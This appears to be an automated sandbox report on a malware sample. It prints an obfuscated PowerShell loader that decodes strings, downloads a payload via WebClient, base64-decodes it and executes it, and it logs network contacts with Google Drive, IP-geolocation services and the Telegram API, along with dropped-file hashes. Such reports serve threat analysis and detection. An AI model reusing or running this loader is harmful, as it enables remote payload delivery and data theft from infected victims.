terI TaxiNArresGafsm lPotl.y Hjag=Reser$Ceskye Disen KrydV lor:YamskAMachiPLampmPDynelD Fllea Intit unwrA all+Forlf$TranscFlaucRsurinyBirumAuhyggl MultG ChimE MembSC,catI Metaa Refl ');Farveblyantens (Heterolysis 'B okb$SuspegHeptaLVaporoOvercBFiskeASyrneLPejus:UncripVo dgaKomm,KB mbeNPenheiSoapwNSkrupgKernesL mpe=Buke $Bema.R,rapeaIni icBesvrKpr.isBSul,hoU vetNFr arEKugle. F,gusMa llP bollLFlykki OtheTAurig( Sire$ ForerSideleMagtffFrembeMlkenr RenseIntr nSm,teDSemidAFonolRIndisEF agmn Thins,reha)Hered ');Farveblyantens (Heterolysis $Uncleaned);$Rackbone=$Paknings[0];$Scotoscope=(Heterolysis 'unabr$Domi,gAandeLBoathoGa.opBS nsua egislUitot:Itchii NdvrS O krOKagefs B,adUSolvelCaro P IndhHA verOLed icMummeYOutmaABlrehnAfbl,iPrelucReveg=HomerNEnateeRv diwCentr- ollO St ubCaesaJNon.eEPartiC.racht vif tderSBan byBa ils V ruTPrisleMu remPharm.BeregNUneffeSigilt equi. asouwMa toeA.gifbkonduCFhovelLsideIRykkee TyrknGoneft R bb ');Farveblyantens ($Scotoscope);Farveblyantens (Heterolysis 'Skrif$inphaIS,lphsafbryoPhysosBantuuDamaslMalebp S othCornioBortlc ,tomyLath aWavennAdunciF ngecGrate.Lkke H Strae NeckaStre dOpstceRodz.r U etsokker[Musci$AktiecAbbrelSkidtaG.undmGlucupEkspe] mphi= rota$ istrSH,neya By.sgSaftnaPolypcVeno,iChilatwildwiFigare BillsExces ');$Speedingly=Heterolysis ' Eksp$anti ISubrisDetaio Unwis VedluStemnlSumakpFeelehClubboBravac oggiyS nbeaSpastnStr.liStaalcTre o. DrikDgo.opoNonmawresidnRadial Usaao,ltfaaVarerdSaturFMicr i,ickelHjnele Bet,(Sac,o$ FusiRPerigaMaturcRaahuk TropbBu.dto NostnAlluveTrecy,oprus$Pol eEA.genb Sld rRomaniBrunseKnsaktLkkesymistu)Tn ep ';$Ebriety=$aggravatingly;Farveblyantens (Heterolysis 'T lpa$ ReingOp amL Fr cO OndyBOverfADdsriLSkole: InveVEneceeOve.hLSodomtMorwka FaarLCircueFdsleNC,rdiH ogikETaba dOli os Lysv=Puckf(u odeT.etereKu.oss MommTInput-AnglopPanteAStri tUnvouh Erst Mid.$Pse,heFolkeBKr ptr Aegri edste NogetKudz,YBiz,r)Cavie ');while (!$Veltalenheds) {Farveblyantens (Heterolysis 'Taran$ ProjgWondelProleoCarpobFor uaMe itlBouil:LetofFSekunoSivmarLegi e AdgasledekkTelesrAkil iOvnemvKvikseOt.emlUdlgssSorgleElodenM,cedsCober= Porp$nea,ttKhe arArcocuFordreLi,je ') ;Farveblyantens $Speedingly;Farveblyantens (Heterolysis ' Byg SHetzeT reopADrgtir d pltsamme- eklaSB,ritlEuryleViza EPapulPPanni Oplsn4 Alst ');Farveblyantens (Heterolysis ' Ko.o$Gavn gMaskiLC iroOMessibBegmaa Aks l Sta,: Mye,VPrea EBrnell BirctResodaMin,rlAsym.E LandnS.hizHPetr,eNoggiDirkapSSix.y=alcoh(AllesT HoveEDubbes.mnorTnonel-Al haPGyne aP ppyt ntenhProdu Inte.$JaminE rggB replRFyr tiForeceHusteT,pspay Stee)A ten ') ;Farveblyantens (Heterolysis 'Clube$DiskogArbejlOverdodramabGodseATe rilfl gt: ollskUnp,rEAb.epr Hy.rnSrbehe F.grrGena e UopsAKommukmodspTGa,eporenteRHvid EHairgRsjlesSInter= Verd$Mi,coGfl.orlSynoroAnti bKvindAMu aglSecun: .utldTaksiEBi,ulR Pl dAToupyY.ndtrsThyme+ Stor+Sper % Tmme$ CellpDel,ga S ulkTh rmN upariSidebn,veriGPleatSUnpos.prececForbeoF uefUResalnAltertturba ') ;$Rackbone=$Paknings[$Kernereaktorers];}$Monkess=299952;$Troperegnens=31724;Farveblyantens (Heterolysis 'B for$bardiG U.gdl ydeloHumo b rugtaPerinLKedel:RokkeksauldiOut,iNFljalA Kl seUnsupS yd yTMetamhMotorEAssonTAs.roiMaskiCStussaEkspoL tounlUng.ay Coss Kant = Iltr TableGNondiE A beTMaihe-Picolc prosoRondoNPr ciTha raE ,aluNRakesTHy.og P ead$ TredeForreb ociarFinhviLis.eE Kry tPaideyKolon ');Farveblyantens (Heterolysis 'Rumle$ForndgTnksol lerco idenbCephaatranslRaket:N nreO reaciStraplHandiiArvensJawf.hinco Rares= Vete Asfal[Ula.rSSpeciyArveasB,nomtdelpreVej em Gowd. erapCPal,eoPlentnOpslavElusieKrea.rQuadrtMe be] Prio:Thirs:ElskeFEffekrHderso.atstmChronB GrovaTinstsBeepeeIsoci6Glend4HyperSShammt Thi rSmr.ei Pr anRealkgAgree(fa.ds$Rnke K chasiCataln HydraPanele HomosExci,t Lavvh AmoreA seltHeavyiUtaalcJub.laSelvilGarotl irexy Tidd)major ');Farveblyantens (Heterolysis 'Depil$PaleoGTabb LFuroroUnchrBDolinaForstLSu fo: I,dhFAmireaTroldl B mbdPatrilplynde F,rsmCinem Rel e= Undi Glass[GenneS ountyAnno,SCutofTAd.neEPaireM P an.TilsiTQu.nae,ntisxNonubt Prin. iltee As.onSkilbcFlygeO BoblDUgle I CrasnFratrG Exce]Bevis:Kreml: ileAMe orsAl orcBu,triI geni s.ok.OpbraGO,erhEA,delTAf egSBr nzTLiebeR oldnivvninNVokalGAnst.(Per b$ krabOKo.leiLserslPremoICambiSTestpH Dees)Ep.xy ');Farveblyantens (Heterolysis 'Theti$ Befag Car.L U,clocorinBHemibAP eefl emat: OversJagthaSauntMSylleuSndagERetmslBarges Dokt=Tha.a$ evefM,mboAFinkmLSubtlD Sal.lScutte TortMBio e.Acyros idsruforsrb ,ayoSMittetEvittRtekn iRecalN PatogPyrrh(Jubil$ UforM ysseoHa shNAlmenKSkandeDobosSTraucSSteam, apno$subb tBaronRcowieOFrakepDecimEEpiphRTreadEEftergdelggNEks le.vertn DyrksSuber) Hors ');Farveblyantens $Samuels;"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\SysWOW64\msiexec.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 142.250.179.238:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.187.193:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 193.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
GB 142.250.179.238:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
US 8.8.8.8:53 3.180.250.142.in-addr.arpa udp
GB 142.250.180.3:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.180.3:80 o.pki.goog tcp
GB 142.250.187.193:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 checkip.dyndns.org udp
BR 132.226.247.73:80 checkip.dyndns.org tcp
US 8.8.8.8:53 77.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 158.101.44.242:80 checkip.dyndns.org tcp
US 8.8.8.8:53 242.44.101.158.in-addr.arpa udp
US 8.8.8.8:53 reallyfreegeoip.org udp
US 104.21.67.152:443 reallyfreegeoip.org tcp
US 8.8.8.8:53 152.67.21.104.in-addr.arpa udp
US 104.21.67.152:443 reallyfreegeoip.org tcp
US 104.21.67.152:443 reallyfreegeoip.org tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files

memory/2736-0-0x00007FFC36553000-0x00007FFC36555000-memory.dmp

memory/2736-1-0x0000019AF6330000-0x0000019AF6352000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_anvzmai3.sj1.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2736-11-0x00007FFC36550000-0x00007FFC37011000-memory.dmp

memory/2736-12-0x00007FFC36550000-0x00007FFC37011000-memory.dmp

memory/2736-13-0x00007FFC36553000-0x00007FFC36555000-memory.dmp

memory/2736-14-0x00007FFC36550000-0x00007FFC37011000-memory.dmp

memory/2736-17-0x00007FFC36550000-0x00007FFC37011000-memory.dmp

memory/2736-20-0x00007FFC36550000-0x00007FFC37011000-memory.dmp

memory/4428-21-0x0000000002870000-0x00000000028A6000-memory.dmp

memory/4428-22-0x00000000053F0000-0x0000000005A18000-memory.dmp

memory/4428-23-0x00000000052B0000-0x00000000052D2000-memory.dmp

memory/4428-24-0x0000000005350000-0x00000000053B6000-memory.dmp

memory/4428-25-0x0000000005A20000-0x0000000005A86000-memory.dmp

memory/4428-35-0x0000000005B50000-0x0000000005EA4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 806286a9ea8981d782ba5872780e6a4c
SHA1 99fe6f0c1098145a7b60fda68af7e10880f145da
SHA256 cd2c977928e78b2d39bba8a726308f17b2946ea3f1a432de209720f691450713
SHA512 362df97f9fc9c2f546538814cd0402a364a286326219f03325f8cbd59d33f9d850c26daf42230f0bb4feb7e5134868a51e7a3d2f5bc136fe3de69d5d82c5ae2e

memory/4428-37-0x0000000006180000-0x000000000619E000-memory.dmp

memory/4428-38-0x0000000006220000-0x000000000626C000-memory.dmp

memory/4428-39-0x00000000079D0000-0x000000000804A000-memory.dmp

memory/4428-40-0x0000000006740000-0x000000000675A000-memory.dmp

memory/4428-41-0x00000000073F0000-0x0000000007486000-memory.dmp

memory/4428-42-0x0000000007390000-0x00000000073B2000-memory.dmp

memory/4428-43-0x0000000008600000-0x0000000008BA4000-memory.dmp

C:\Users\Admin\AppData\Roaming\Databaands.Cag

MD5 f6579ea1ab825b27780f29716bf33381
SHA1 2f4b5633c9540b3010c53fc058efc3d6d77642f3
SHA256 88ae5c99126911132ed637b343c055ff1be103986116f998ef7247a573e2d823
SHA512 2977eacd74cfb217d8ec3ea87441a8211b7ffa2103e083b3e690fc9604615929159aad52fd2f2c35b53a3656298c8b2c0c08e51d5953f9c8f2ebc472b30a4e67

memory/4428-45-0x0000000008BB0000-0x000000000D03A000-memory.dmp

memory/4568-49-0x0000000000B00000-0x0000000001D54000-memory.dmp

memory/4568-60-0x0000000000B00000-0x0000000000B48000-memory.dmp

memory/4568-59-0x0000000000B00000-0x0000000001D54000-memory.dmp

memory/4568-61-0x0000000023B60000-0x0000000023BFC000-memory.dmp

memory/4568-67-0x00000000247A0000-0x0000000024962000-memory.dmp

memory/4568-68-0x0000000000660000-0x00000000006B0000-memory.dmp

memory/4568-70-0x0000000024010000-0x00000000240A2000-memory.dmp

memory/4568-71-0x0000000023FC0000-0x0000000023FCA000-memory.dmp